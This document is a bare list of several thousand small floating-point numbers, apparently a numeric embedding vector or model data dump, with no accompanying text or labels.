-0.010653510689735413, -0.0431884303689003, -0.006485786288976669, 0.008130311034619808, -0.031946856528520584, -0.006919995415955782, -0.008766238577663898, 0.014209238812327385, -0.032685354351997375, -0.004198495298624039, 0.03572139889001846, -0.0009701327071525156, -0.00923805683851242, 0.04083617776632309, 0.02136172354221344, 0.0012051869416609406, -0.0116655258461833, -0.011159517802298069, 0.009839795529842377, 0.030415156856179237, -0.014988764189183712, 0.025095239281654358, 0.02032235823571682, 0.00938849151134491, 0.02279769256711006, -0.02352251298725605, -0.015371688641607761, 0.041246455162763596, -0.005778059363365173, -0.01444172952324152, 0.007706358563154936, 0.04288756102323532, 0.020253978669643402, 0.0002489437465555966, 0.006441339384764433, -0.012588647194206715, -0.018421409651637077, 0.035694047808647156, 0.028254367411136627, -0.01615121401846409, 0.003931815270334482, 0.0026377353351563215, 0.01862654834985733, 0.007767899893224239, -0.008971377275884151, 0.0077337101101875305, -0.008273907005786896, -0.004177981521934271, -0.021389076486229897, 0.0028616779018193483, 0.024684963747859, 0.02263358049094677, -0.014250267297029495, 0.015248605981469154, -0.016821332275867462, -0.0007607208099216223, -0.04534921795129776, 0.00971671286970377, 0.005367782898247242, 0.012704892084002495, 0.0020462535321712494, -0.01072189025580883, -0.020459115505218506, 0.015535799786448479, 0.01145354937762022, 0.012862165458500385, 0.010694538243114948, 0.011248411610722542, -0.02320796810090542, -0.02024030312895775, -0.027351759374141693, -0.0009273955947719514, 0.012615999206900597, 0.004277131520211697, -0.0015718714566901326, -0.006755884736776352, 0.04316107556223869, 0.025355082005262375, 0.040617361664772034, -0.004010451957583427, 0.02850053459405899, 0.0039694239385426044, -0.0072550540789961815, -0.02860994078218937, -0.010913352482020855, -0.013819476589560509, -0.026900455355644226, -0.008390151895582676, 0.04696297273039818, 0.007070430088788271, 0.014769949950277805, -0.006304580718278885, -0.010605644434690475, 0.010667186230421066, -0.01239718496799469, 0.010345803573727608, 0.0038565981667488813, -0.015029791742563248, 0.01332030724734068, -0.004766044206917286, 0.03230242803692818, -0.020158246159553528, 0.01178177073597908, 0.014086156152188778, -0.020158246159553528, -0.02013089507818222, -0.0050498186610639095, 0.03744455799460411, 0.017450422048568726, -0.02598417177796364, 0.026312392204999924, -0.0013402362819761038, -0.004126696847379208, -0.021074531599879265, 0.009764578193426132, 0.04283285513520241, 0.008267069235444069, 0.0002621922467369586, 0.02487642504274845, -0.004919897764921188, 0.015877695754170418, -0.02151215821504593, 0.013450227677822113, 0.013586986809968948, -0.021457456052303314, 0.008123472332954407, 0.015248605981469154, 0.016561491414904594, 0.004571163095533848, -0.0010111603187397122, 0.006851615849882364, 0.029321085661649704, -0.02352251298725605, -0.006506300065666437, 0.006578098051249981, -0.007699520327150822, 0.004229265730828047, -0.005073751322925091, -0.014879357069730759, -0.0013547668932005763, 0.003478802042081952, -0.012362995184957981, 0.00011271916446276009, -0.002514652442187071, 0.006458434276282787, 0.0381830558180809, -0.0024445634335279465, -0.028199665248394012, 0.020541172474622726, -0.0116655258461833, 0.011980070732533932, 0.03722574561834335, -0.016055483371019363, 0.016520462930202484, -0.03848392516374588, 0.02683207578957081, -0.008417503908276558, 0.01278694812208414, 0.009532088413834572, -0.005952426698058844, 0.0021949787624180317, -0.007405489217489958, -0.004225846845656633, 0.023741327226161957, -0.022893423214554787, 0.015453744679689407, 0.01615121401846409, 0.01201426051557064, 0.012144180946052074, 0.01434599794447422, -0.01349809393286705, -0.014222915284335613, 0.009135487489402294, 0.0012795495567843318, -0.00012917295680381358, -0.004591676872223616, -0.022264333441853523, -0.016246944665908813, -0.006885805632919073, 0.018900066614151, 0.030415156856179237, 0.02487642504274845, -0.008157662115991116, -0.003489058930426836, -0.0006243893876671791, -0.010250071994960308, 0.008567938581109047, -0.01627429760992527, -0.001945393974892795, -0.030469860881567, 0.02318061701953411, 0.03197420760989189, 0.0020274491980671883, -0.019173583015799522, -0.011022759601473808, 0.006263553164899349, -0.03139981999993324, -0.013826314359903336, 0.012185209430754185, -0.023809706792235374, -0.02638077177107334, -0.009470546618103981, 0.011610821820795536, -0.008089282549917698, -0.007802089676260948, -0.00030685256933793426, 0.007815765216946602, 0.001446224283427, -0.032329779118299484, 0.012684378772974014, 0.00906027015298605, 0.027201324701309204, -0.02668164111673832, -0.010113312862813473, -0.0060447389259934425, 0.004246360622346401, -0.0003077072906307876, -0.003116391133517027, 0.0004440387128852308, 0.005172901786863804, 0.011022759601473808, 0.00971671286970377, 0.009039756841957569, -0.02850053459405899, -0.01905050128698349, -0.013272441923618317, 0.03525641933083534, 0.010345803573727608, 0.00014167357585392892, -0.008766238577663898, 0.01708117313683033, -0.017423070967197418, -0.0026907294522970915, -0.004906221758574247, -0.013299793004989624, -0.05825924873352051, 0.033068276941776276, 0.003911301493644714, 0.01851714216172695, 0.009983392432332039, 0.018489789217710495, 0.02008986845612526, 0.008280745707452297, -0.026558559387922287, 0.0025881603360176086, -0.0021095045376569033, 0.01892741769552231, -0.006147307809442282, -0.002013773424550891, 0.019255638122558594, -0.018653899431228638, 0.010961217805743217, 0.01716323010623455, 0.015207578428089619, 0.013600662350654602, -0.03167333826422691, 0.018339354544878006, 0.007808927446603775, -0.013429714366793633, -0.046908266842365265, 0.007015726529061794, -0.022893423214554787, 0.024425121024250984, 0.03358796238899231, -0.01642473228275776, -0.003494187258183956, 0.014961413107812405, 0.017915403470396996, -0.014893033541738987, 0.009094459936022758, -0.02964930795133114, -0.02491745352745056, -0.008964539505541325, -0.008711535483598709, 0.013005761429667473, 0.04947933182120323, -0.0026770534459501505, 0.008109796792268753, 0.010140664875507355, 0.00438653863966465, -0.02945784479379654, 0.014893033541738987, 0.012718568556010723, -0.012294615618884563, -0.0027967174537479877, 0.006253296043723822, 0.0181205403059721, -0.019255638122558594, 0.020336033776402473, 0.004930154886096716, 0.005309660453349352, -0.018188919872045517, 0.011788608506321907, -0.016178565099835396, 0.0030172409024089575, -0.009470546618103981, -0.018872713670134544, 0.001733417739160359, -0.020377060398459435, -0.006844778079539537, -0.03987886756658554, 0.015166550874710083, -0.0018941094167530537, 0.023139588534832, 0.02899286523461342, 0.02899286523461342, 0.007740547880530357, 0.01920093595981598, 0.004509621299803257, -0.02337207831442356, 0.003430936485528946, 0.00605499604716897, -0.048959650099277496, -0.02445247396826744, 0.019173583015799522, 0.011002245359122753, -0.0065541653893888, 0.005131873767822981, 0.010783431120216846, -0.00250097643584013, 0.03380677476525307, 0.018229948356747627, 0.008226041682064533, -0.00019199652888346463, -0.011843311600387096, -0.01746409945189953, -0.011405684053897858, 0.011583470739424229, 0.004253198858350515, 0.00902608036994934, 0.0029095434583723545, 0.03717104345560074, 0.0002039629325736314, -0.043981630355119705, 0.019871054217219353, 0.006413987837731838, 0.0021556606516242027, -0.013887856155633926, -0.0065883551724255085, -0.0017077755182981491, -0.00010486622340977192, 0.01843508705496788, 0.032329779118299484, 0.0055797589011490345, 0.015098171308636665, 0.016766628250479698, -0.014715246856212616, 0.027679981663823128, -0.003256568918004632, 0.020732633769512177, -0.01228094007819891, 0.013853666372597218, 0.02695515938103199, 0.014072480611503124, 0.0011590308276936412, -0.011891177855432034, -0.012561296112835407, -0.0007996116182766855, -0.007576437667012215, 0.03656930476427078, -0.03736250475049019, -0.027898795902729034, -0.020582199096679688, 0.022619904950261116, 0.015371688641607761, -0.020336033776402473, 0.006896062288433313, -0.016766628250479698, 0.0005722501082345843, -0.04556803032755852, -0.020021488890051842, 0.02159421518445015, -0.02746116742491722, -0.0069952127523720264, 0.011809122748672962, 0.004547229968011379, 0.02356354147195816, 0.0014419505605474114, 0.0033933278173208237, -0.004629285540431738, -0.011405684053897858, 0.0004440387128852308, -0.018038485199213028, 0.013026275672018528, 0.010961217805743217, -0.008472207933664322, -0.0071182954125106335, -0.0028189406730234623, -0.021949786692857742, 0.0004889126867055893, -0.00024338792718481272, 0.009067108854651451, 0.0013308341149240732, -0.015822993591427803, 0.023071208968758583, -0.007405489217489958, -0.007405489217489958, 0.017682911828160286, -0.01797010563313961, -0.0036480410490185022, -0.0013128845021128654, -0.012752758339047432, 0.01885903812944889, -0.004123277962207794, -0.02915697544813156, 0.027256028726696968, 0.00006506727368105203, 0.00030172409606166184, 0.0077337101101875305, -0.005760964471846819, 0.016219593584537506, -0.02441144548356533, -0.004092507064342499, -0.026312392204999924, 0.011050110682845116, -0.03219301998615265, -0.007330271415412426, -0.019966784864664078, 0.004807071760296822, -0.04696297273039818, -0.01684868335723877, -0.0039830999448895454, 0.005316498223692179, 0.01068086177110672, 0.007207188755273819, -0.005087427329272032, 0.024356741458177567, -0.0005265213549137115, -0.028774050995707512, -0.011378332041203976, -0.015672558918595314, 0.005042980890721083, 0.009655171073973179, 0.026791049167513847, -0.020459115505218506, 0.016534138470888138, 0.006352446042001247, -0.0021522415336221457, -0.010933865793049335, 0.024466149508953094, -0.019761646166443825, -0.04277815297245979, 0.010154340416193008, 0.0006504590273834765, -0.027707332745194435, 0.017341015860438347, -0.01892741769552231, 0.02155318669974804, 0.004085669293999672, 0.0004117721982765943, -0.014619515277445316, 0.013600662350654602, 0.020965123549103737, -0.01731366477906704, 0.007207188755273819, -0.004468593746423721, -0.0068174260668456554, -0.016493111848831177, -0.013416037894785404, 0.000014410424228117336, -0.024425121024250984, -0.022414768114686012, -0.007343947421759367, 0.004359186626970768, 0.008745725266635418, -0.017450422048568726, -0.004854937549680471, -0.03139981999993324, 0.002622349886223674, -0.022236980497837067, 0.0366240069270134, -0.021074531599879265, 0.006294323597103357, -0.012807461433112621, -0.016903387382626534, 0.02676369622349739, 0.03000488132238388, 0.004136953502893448, -0.01552212331444025, 0.0019932594150304794, 0.015836669132113457, 0.01100908312946558, 0.003620689269155264, -0.004475431516766548, -0.006089185364544392, -0.03864803537726402, 0.0026582491118460894, -0.015084495767951012, 0.009785092435777187, -0.00186333863530308, 0.005145549774169922, 0.015508447773754597, 0.022961802780628204, 0.003877111943438649, 0.006431082729250193, -0.00856110081076622, 0.015303310006856918, 0.017053822055459023, 0.016670897603034973, -0.013046789914369583, -0.029403142631053925, 0.0057438695803284645, -0.0074465167708694935, 0.007084105629473925, 0.01515287533402443, -0.042203765362501144, -0.003600175492465496, -0.01216469518840313, -0.010434696450829506, 0.03358796238899231, 0.021238641813397408, 0.016793981194496155, -0.0018240205245092511, 0.0005538731347769499, -0.02240109071135521, 0.0350923091173172, 0.019830025732517242, -0.02553286775946617, -0.0041608866304159164, -0.020814688876271248, 0.0015864020679146051, 0.023358402773737907, -0.019228287041187286, -0.004359186626970768, -0.003468545153737068, 0.0011872373288497329, -0.015043468214571476, -0.00915600173175335, 0.01472892239689827, -0.003948910161852837, 0.010475724004209042, -0.01307414099574089, 0.011822798289358616, -0.009723550640046597, -0.0025608085561543703, 0.012089477851986885, -0.005911399144679308, 0.019734295085072517, -0.00011410812294343486, 0.011412521824240685, -0.02236006408929825, 0.013046789914369583, 0.003750610165297985, 0.0048993839882314205, 0.008417503908276558, -0.02244211919605732, 0.0021488226484507322, 0.0022633580956608057, 0.010407344438135624, 0.0017299988539889455, -0.010325289331376553, -0.009901337325572968, -0.009962878189980984, 0.005518217571079731, -0.01189801562577486, 0.018448762595653534, -0.019269315525889397, 0.016725601628422737, -0.03304092586040497, -0.030032232403755188, -0.02298915386199951, -0.006280648056417704, 0.026558559387922287, 0.014154535718262196, 0.003412132151424885, 0.019187260419130325, -0.006653315387666225, -0.0058943042531609535, 0.013976749032735825, -0.021566862240433693, 0.001535972231067717, 0.002189850201830268, -0.005087427329272032, -0.03167333826422691, -0.0138810183852911, -0.0004944685497321188, 0.003213831689208746, -0.010619320906698704, -0.01322457566857338, 0.017368366941809654, -0.0030206600204110146, -0.006537070497870445, 0.0014812687877565622, -0.00005048322782386094, -0.008020903915166855, -0.004936992656439543, -0.018995797261595726, -0.00856110081076622, 0.009696198627352715, -0.012185209430754185, -0.007890982553362846, 0.012089477851986885, -0.010140664875507355, -0.012144180946052074, -0.0020548009779304266, -0.0013504931703209877, 0.016493111848831177, -0.0006397747783921659, -0.009730388410389423, 0.004984858445823193, -0.006304580718278885, 0.024397769942879677, 0.0031283574644476175, -0.009429519064724445, 0.0094500333070755, 0.003757447935640812, -0.02344045788049698, -0.015604179352521896, -0.013559634797275066, 0.016561491414904594, 0.025136267766356468, 0.011515091173350811, -0.002090700203552842, 0.004212170839309692, -0.025738006457686424, 0.005251538008451462, 0.005836181808263063, -0.02653120644390583, -0.007330271415412426, 0.0038942068349570036, 0.01319038588553667, 0.00010897967149503529, -0.01635635271668434, 0.002897577127441764, -0.019214611500501633, 0.007159322965890169, 0.00927224662154913, -0.01665722206234932, 0.016575166955590248, 0.0017223061295226216, 0.03501025214791298, 0.0027095337864011526, 0.006410568952560425, -0.01083813514560461, 0.01027742400765419, -0.01260916143655777, -0.003771123941987753, -0.003808732610195875, 0.023084884509444237, 0.009128649719059467, -0.008848294615745544, 0.0011513381032273173, 0.025136267766356468, -0.027515869587659836, -0.008055093698203564, -0.003644621931016445, -0.011795446276664734, 0.0003136904851999134, 0.015754614025354385, -0.013641689904034138, -0.006013968028128147, -0.015344337560236454, 0.009709875099360943, 0.014400701969861984, -0.018900066614151, -0.007774737663567066, 0.003897625720128417, -0.01604180783033371, 0.01124157290905714, 0.009019242599606514, -0.00011912973423022777, -0.00861580390483141, 0.01127576269209385, -0.013204062357544899, 0.001971036195755005, -0.013183548115193844, 0.00622936338186264, -0.012445050291717052, -0.002892448566854, 0.01585034467279911, 0.021457456052303314, -0.02290709875524044, -0.020677929744124413, -0.04362605884671211, -0.011562956497073174, -0.0023847315460443497, 0.005914818029850721, 0.000389335211366415, -0.0052002533338963985, -0.017710264772176743, 0.006605450063943863, 0.023768680170178413, -0.02595682069659233, 0.005863533355295658, -0.015973428264260292, 0.008075607009232044, -0.008007227443158627, 0.009258571080863476, 0.012595484964549541, -0.001406906172633171, 0.00484126154333353, 0.005542150232940912, -0.02320796810090542, 0.005371201783418655, -0.008820942603051662, -0.016534138470888138, -0.01569990999996662, -0.017710264772176743, -0.013067303225398064, -0.005542150232940912, 0.03295886889100075, 0.02301650680601597, 0.009511574171483517, -0.0183120034635067, -0.004731854423880577, 0.0028616779018193483, 0.025546543300151825, 0.00277620367705822, 0.008807267062366009, -0.0025744843296706676, -0.017354691401124, -0.007309757638722658, 0.01928299106657505, -0.0035830806009471416, -0.0020548009779304266, 0.005189996212720871, 0.008082444779574871, -0.0065233949571847916, 0.02216860093176365, -0.013422876596450806, 0.0029625375755131245, 0.006284066941589117, -0.004273712635040283, -0.006024225149303675, 0.010585131123661995, 0.013586986809968948, -0.0014291295083239675, -0.0052925655618309975, -0.015207578428089619, 0.01044837199151516, -0.023030182346701622, 0.02517729438841343, -0.02510891482234001, -0.0037984757218509912, 0.005193415563553572, 0.028527885675430298, -0.01004493422806263, -0.00832861103117466, 0.0160007793456316, -0.022455794736742973, 0.0011598855489864945, -0.010174854658544064, 0.012971572577953339, -0.009873985312879086, 0.005248119123280048, -0.002218911424279213, 0.005060075782239437, -0.0042702932842075825, 0.01041418220847845, -0.0027163715567439795, -0.004003613721579313, 0.011166355572640896, 0.007699520327150822, -0.008691021241247654, -0.01319038588553667, -0.006796912290155888, -0.008314934559166431, -0.005682328250259161, -0.002926638349890709, -0.0052652135491371155, -0.01293738279491663, 0.03271270543336868, 0.008205528371036053, -0.01222623698413372, -0.019843701273202896, 0.0109885698184371, -0.006352446042001247, 0.0016795690171420574, 0.02402852103114128, -0.020144570618867874, 0.016520462930202484, 0.0071046194061636925, -0.0038839499466121197, -0.013942559249699116, -0.022113898769021034, 0.0007372153922915459, -0.03290416672825813, -0.0037745428271591663, -0.01765556074678898, -0.013176710344851017, 0.034846141934394836, 0.0018035066314041615, -0.01585034467279911, 0.017600856721401215, -0.01646575890481472, -0.01654781401157379, -0.022387415170669556, 0.006769560743123293, -0.016246944665908813, -0.006930252071470022, 0.004759206436574459, 0.018845362588763237, 0.01970694214105606, -0.012103153392672539, -0.007932010106742382, 0.01399726327508688, -0.014428053051233292, 0.011980070732533932, -0.0017949591856449842, 0.008567938581109047, -0.029895473271608353, 0.002364217769354582, -0.003914720844477415, -0.02352251298725605, 0.0031796421390026808, -0.01139200758188963, 0.019064176827669144, 0.0007803799235261977, -0.0018906904151663184, 0.030251046642661095, -0.004796815104782581, 0.011631336063146591, 0.028774050995707512, -0.016876036301255226, 0.0013889565598219633, 0.02375500276684761, 0.01589137315750122, -0.02464393526315689, 0.0008577341213822365, 0.003042883239686489, -0.01805216073989868, -0.007562761660665274, 0.0015958042349666357, -0.016479434445500374, 0.016452083364129066, 0.017423070967197418, 0.01561785489320755, -0.01962488703429699, 0.014359673485159874, 0.004540392197668552, 0.0013436551671475172, 0.006455015391111374, -0.004338672850281, 0.012383509427309036, -0.005084008444100618, 0.0015265700640156865, -0.0069029005244374275, 0.005627624690532684, 0.006820844952017069, -0.0026138024404644966, -0.04901435226202011, -0.0022736149840056896, 0.007699520327150822, -0.004345510620623827, 0.019351370632648468, -0.0018274394096806645, 0.003364266362041235, 0.0012257007183507085, 0.007084105629473925, -0.026736345142126083, 0.004872032441198826, 0.0010154340416193008, -0.01384682860225439, -0.009764578193426132, 0.0005679763853549957, 0.013928883709013462, -0.023590892553329468, 0.002261648653075099, -0.007439678534865379, 0.0161922425031662, 0.009135487489402294, 0.0037095823790878057, -0.033533256500959396, 0.01249291654676199, 0.0058225058019161224, 0.009607305750250816, 0.015316985547542572, 0.015221253968775272, 0.004249779507517815, -0.006591774057596922, -0.014687894843518734, 0.020541172474622726, 0.010058609768748283, -0.0039967759512364864, 0.003347171703353524, 0.014769949950277805, 0.008280745707452297, 0.01056461688131094, -0.004410471301525831, -0.000021194942746660672, -0.015084495767951012, 0.00534043088555336, -0.008902997709810734, -0.007767899893224239, -0.0033711043652147055, 0.00968252308666706, -0.015084495767951012, 0.001618027570657432, -0.008991891518235207, -0.01262967474758625, 0.0026479922235012054, -0.016055483371019363, 0.011672363616526127, 0.008123472332954407, -0.00516606355085969, 0.0061951735988259315, -0.014154535718262196, 0.029129624366760254, -0.012944220565259457, 0.006198592483997345, -0.00522418599575758, -0.032603297382593155, -0.011268924921751022, -0.006078928709030151, 0.016055483371019363, -0.006502880714833736, 0.021813029423356056, 0.00522418599575758, -0.00037480457103811204, 0.010667186230421066, -0.011214221827685833, 0.007234540302306414, -0.005101103335618973, -0.0217856764793396, -0.012499754317104816, 0.0024565299972891808, 0.00211634230799973, -0.014975088648498058, 0.0034531597048044205, 0.012246750295162201, -0.01913255639374256, 0.00007489680865546688, -0.03172804042696953, -0.011658688075840473, 0.0051284548826515675, 0.00022565202380064875, 0.0011436454951763153, -0.034490570425987244, 0.020459115505218506, -0.002037706086412072, -0.006663572508841753, 0.004277131520211697, -0.00344119337387383, 0.026435475796461105, -0.017327340319752693, -0.015822993591427803, 0.004007032606750727, -0.015604179352521896, 0.011480901390314102, 0.0008932059281505644, 0.004728435538709164, 0.00761746522039175, 0.01228094007819891, -0.001171851996332407, -0.010537265799939632, -0.004902802873402834, -0.03443586453795433, 0.003077073022723198, -0.004578000865876675, 0.020377060398459435, -0.005391715560108423, -0.02248314581811428, -0.0026479922235012054, -0.0123424818739295, -0.0043557677417993546, -0.012479240074753761, -0.007043078076094389, -0.004472012631595135, 0.002253101207315922, -0.01688971184194088, -0.0042053330689668655, 0.0008739741751924157, 0.000605585053563118, 0.002430887660011649, 0.019447101280093193, -0.0011359527707099915, 0.024425121024250984, 0.015440068207681179, -0.005750707350671291, -0.002203526208177209, -0.013922045938670635, -0.032220374792814255, -0.017423070967197418, 0.009073946624994278, -0.027584249153733253, 0.0023864409886300564, 0.012144180946052074, -0.01210999209433794, -0.023618245497345924, 0.002805264899507165, -0.007795251440256834, -0.004940411541610956, 0.011692876927554607, -0.020951448008418083, 0.00028740716516040266, -0.010523589327931404, 0.010585131123661995, -0.0032634069211781025, 0.011829636059701443, -0.004229265730828047, 0.00404806062579155, -0.020336033776402473, -0.004769463092088699, -0.009990230202674866, -0.008923511952161789, -0.026695318520069122, -0.003227507695555687, -0.006352446042001247, -0.01638370379805565, 0.008622642606496811, -0.01820259541273117, -0.014934061095118523, 0.010373154655098915, -0.009723550640046597, -0.009197029285132885, 0.011063787154853344, -0.011289439164102077, -0.010523589327931404, -0.01295789610594511, 0.006704600062221289, 0.0014308389509096742, -0.007576437667012215, 0.019652239978313446, -0.020842041820287704, 0.005613948684185743, -0.008239717222750187, -0.011528766714036465, 0.036733414977788925, 0.006048157811164856, -0.00988766085356474, 0.00902608036994934, -0.004260036628693342, 0.009361139498651028, -0.016452083364129066, 0.00950473640114069, 0.021525835618376732, -0.010619320906698704, -0.020199274644255638, 0.012390347197651863, -0.002634316449984908, 0.005709679797291756, -0.003966005053371191, -0.01515287533402443, -0.012944220565259457, 0.0007316595874726772, -0.02737911231815815, 0.021990815177559853, 0.008451693691313267, 0.022537849843502045, 0.01877698302268982, -0.009703036397695541, -0.004171143285930157, 0.0011735614389181137, -0.007364461198449135, 0.0006000292487442493, -0.010106475092470646, -0.017874374985694885, 0.005090846214443445, -0.0022975478786975145, 0.004543811082839966, 0.011248411610722542, -0.008547425270080566, -0.011843311600387096, -0.003959167283028364, 0.0072960820980370045, -0.019597535952925682, 0.010195368900895119, 0.009785092435777187, 0.015672558918595314, 0.03558463975787163, 0.012636513449251652, -0.032986223697662354, 0.019884729757905006, -0.021840380504727364, -0.003993357066065073, 0.017190581187605858, -0.03397088497877121, 0.026859428733587265, 0.0013556216144934297, 0.002183012431487441, 0.010400506667792797, 0.0018992378609254956, 0.015207578428089619, -0.018298327922821045, 0.020199274644255638, -0.008574776351451874, 0.023344727233052254, 0.007043078076094389, 0.02587476558983326, -0.016711926087737083, -0.005713098682463169, 0.004215590190142393, -0.020773662254214287, -0.026079902425408363, 0.004085669293999672, 0.02606622688472271, -0.018530817702412605, -0.028774050995707512, 0.024575555697083473, -0.025806386023759842, -0.00938849151134491, 0.0005547278560698032, 0.010284261777997017, 0.01850346475839615, -0.0004344228655099869, -0.008820942603051662, 0.02456188015639782, -0.008697859942913055, -0.011357818730175495, 0.004858356434851885, -0.012185209430754185, -0.03295886889100075, 0.028746699914336205, 0.020336033776402473, -0.022537849843502045, -0.001100908382795751, -0.021416427567601204, 0.01951548084616661, 0.017942754551768303, -0.0019983879756182432, -0.0036412030458450317, -0.005097684450447559, 0.0010752660455182195, -0.006537070497870445, 0.003911301493644714, 0.0026719251181930304, -0.008520073257386684, 0.006061833817511797, -0.006434501614421606, 0.023919114843010902, -0.0038702739402651787, -0.0000834976599435322, 0.011036435142159462, -0.016328999772667885, 0.006800331175327301, 0.005839600693434477, 0.0030360452365130186, -0.04075412079691887, -0.0007726871990598738, 0.002480462659150362, -0.005473771132528782, 0.007932010106742382, -0.015180226415395737, 0.007808927446603775, 0.0015128941740840673, -0.006294323597103357, -0.0007025983068160713, 0.0013684427831321955, -0.010933865793049335, 0.025396108627319336, -0.025095239281654358, 0.03377942368388176, 0.0027112432289868593, -0.001477849786169827, 0.0012804042780771852, 0.0020052259787917137, -0.023932790383696556, -0.013019437901675701, 0.010133827105164528, 0.0020753147546201944, 0.006266972050070763, -0.012287777848541737, 0.011959557421505451, -0.018298327922821045, 0.010619320906698704, 0.0069541847333312035, -0.016780303791165352, 0.006349027156829834, 0.00834912434220314, -0.0053062415681779385, -0.009928688406944275, -0.01701279543340206, -0.001588966348208487, -0.003246312029659748, 0.02657223492860794, 0.014332322403788567, 0.010325289331376553, 0.012116829864680767, 0.010072285309433937, -0.026736345142126083, 0.0012180081102997065, -0.007364461198449135, -0.00051455496577546, -0.0008504687575623393, 0.002353960881009698, -0.022236980497837067, 0.0137852868065238, 0.019460776820778847, 0.003357428591698408, 0.03038780577480793, -0.01646575890481472, 0.017245285212993622, -0.015864020213484764, -0.007542247883975506, 0.034381162375211716, 0.012157857418060303, -0.02117026224732399, -0.015686234459280968, 0.010810783132910728, 0.0026907294522970915, 0.014387025497853756, 0.0012385218869894743, 0.01482465397566557, 0.009942364878952503, -0.0030941679142415524, -0.011911691166460514, -0.0152349304407835, -0.013935721479356289, 0.00416430551558733, 0.0034104224760085344, 0.01490670908242464, 0.013853666372597218, -0.003528377041220665, -0.019296666607260704, 0.029950177296996117, -0.016328999772667885, -0.011474063619971275, -0.004571163095533848, -0.02406954951584339, 0.015029791742563248, -0.005401972681283951, -0.02945784479379654, 0.016397379338741302, 0.006106280256062746, 0.010585131123661995, 0.0005401972448453307, -0.003183061024174094, -0.014742598868906498, 0.002494138665497303, 0.015180226415395737, 0.0219771396368742, -0.0026479922235012054, -0.006448177620768547, 0.00577464047819376, -0.0016445245128124952, -0.024192631244659424, -0.006078928709030151, 0.010940703563392162, 0.0016616194043308496, 0.002232587430626154, -0.009785092435777187, 0.012581809423863888, -0.0042702932842075825, 0.011419359594583511, 0.012691216543316841, -0.0160007793456316, -0.01847611367702484, -0.009532088413834572, -0.0012479240540415049, 0.021101882681250572, -0.015070819295942783, -0.014646867290139198, -0.005159225780516863, 0.011050110682845116, -0.02691413089632988, -0.01665722206234932, 0.0028787727933377028, 0.000907736539375037, 0.034490570425987244, 0.00622936338186264, 0.000963294820394367, -0.0036753928288817406, 0.027160298079252243, -0.018298327922821045, -0.010311613790690899, 0.013156196102499962, -0.005131873767822981, 0.015481095761060715, 0.00906027015298605, -0.03252124413847923, -0.0006739644450135529, -0.0016163180116564035, -0.01627429760992527, -0.013511769473552704, -0.010085961781442165, -0.03375207260251045, -0.01773761585354805, -0.0037847997155040503, 0.0008923511486500502, 0.005234443116933107, -0.04102763906121254, 0.0004444661026354879, -0.008718373253941536, 0.025355082005262375, -0.012677541002631187, -0.02259255386888981, -0.0006376379169523716, 0.01027742400765419, 0.0038736930582672358, 0.017874374985694885, 0.0030360452365130186, 0.0053370120003819466, -0.0072550540789961815, -0.007186674978584051, 0.015070819295942783, -0.012205722741782665, -0.02610725536942482, 0.0018547911895439029, 0.010462048463523388, 0.002160788979381323, -0.015426392666995525, 0.017409395426511765, -0.01168603915721178, 0.004109601955860853, -0.003095877356827259, 0.00823287945240736, -0.022031841799616814, -0.00186333863530308, 0.00882778037339449, 0.0008423487306572497, 0.027160298079252243, -0.008055093698203564, 0.014865681529045105, 0.018106864765286446, -0.0034206793643534184, -0.003931815270334482, 0.004366024862974882, -0.01608283445239067, 0.004796815104782581, 0.003976262174546719, -0.003818989498540759, 0.013798963278532028, 0.012451888993382454, -0.026312392204999924, -0.000010784446203615516, -0.037800133228302, -0.014127183705568314, -0.0010333836544305086, -0.017135877162218094, 0.006154146045446396, 0.009265408851206303, 0.007918334566056728, -0.003562566824257374, -0.012349319644272327, -0.008321773260831833, -0.0022479728795588017, -0.005952426698058844, -0.007761061657220125, 0.007631141226738691, -0.0009154292056336999, -0.010092799551784992, 0.011863825842738152, -0.0008726920932531357, 0.0025402947794646025, -0.009785092435777187, 0.008950863033533096, 0.02379603125154972, -0.00239156954921782, 0.015193902887403965, 0.006106280256062746, -0.013470741920173168, -0.015166550874710083, 0.011945880949497223, 0.010503076016902924, -0.016069158911705017, -0.005791735369712114, -0.021197613328695297, -0.021224966272711754, 0.00846536923199892, -0.016110187396407127, 0.018038485199213028, -0.01835303008556366, -0.015193902887403965, 0.012274102307856083, -0.021047178655862808, -0.01850346475839615, -0.0018308584112673998, -0.0007568745058961213, 0.02236006408929825, 0.0004957506316713989, 0.009593630209565163, -0.007084105629473925, 0.0027591087855398655, 0.0044480799697339535, -0.012800623662769794, -0.022455794736742973, -0.02610725536942482, -0.002241134876385331, -0.00033826433354988694, -0.026900455355644226, 0.008691021241247654, -0.020541172474622726, 0.01843508705496788, -0.016069158911705017, 0.020390737801790237, 0.003972843289375305, 0.019720619544386864, 0.012533944100141525, -0.010598806664347649, 0.002061638981103897, -0.027502194046974182, 0.01193220540881157, -0.009313274174928665, 0.020541172474622726, -0.00266508711501956, 0.008185014128684998, -0.012362995184957981, 0.020732633769512177, -0.012465564534068108, -0.0011992037761956453, 0.02460290864109993, -0.011043272912502289, -0.0277620367705822, 0.02657223492860794, 0.012171532958745956, -0.0007897820905782282, -0.0061507271602749825, 0.02973136305809021, -0.025095239281654358, -0.007603789214044809, 0.03804629668593407, 0.008745725266635418, -0.005148968659341335, -0.011809122748672962, 0.017559830099344254, 0.00538829667493701, 0.012123667635023594, 0.0044617559760808945, -0.005135293118655682, 0.0013086107792332768, -0.01366904191672802, -0.01206896360963583, -0.013812638819217682, 0.004772881977260113, -0.0008256812579929829, 0.005651557352393866, 0.003767704823985696, 0.003037754911929369, -0.014701571315526962, -0.00007623234705533832, -0.006790074519813061, 0.006622544955462217, 0.0071046194061636925, -0.00844485592097044, -0.036186378449201584, -0.0074328407645225525, -0.0004679715202655643, -0.0008692730916664004, -0.005863533355295658, 0.008383314125239849, -0.0011128747137263417, -0.0012257007183507085, 0.008075607009232044, 0.011357818730175495, -0.014031453058123589, 0.012588647194206715, 0.020117219537496567, -0.01824362389743328, -0.003740353276953101, -0.00856110081076622, -0.012062125839293003, -0.010345803573727608, -0.01000390574336052, -0.01788805052638054, -0.02233271114528179, 0.007836279459297657, 0.007685844320803881, -0.014414377510547638, -0.012636513449251652, 0.006232782267034054, -0.021922435611486435, 0.009880823083221912, 0.019146231934428215, -0.025478163734078407, -0.015207578428089619, 0.01193220540881157, -0.002673634560778737, 0.0011436454951763153, 0.005207091104239225, -0.00211634230799973, -0.02040441334247589, -0.007248216308653355, -0.015467420220375061, 0.003217250807210803, -0.007261892315000296, 0.002989889355376363, -0.003976262174546719, 0.019611211493611336, -0.02047279290854931, 0.01457848772406578, 0.011152680031955242, 0.012814299203455448, -0.05071016401052475, -0.0043694437481462955, 0.003364266362041235, 0.0239054374396801, 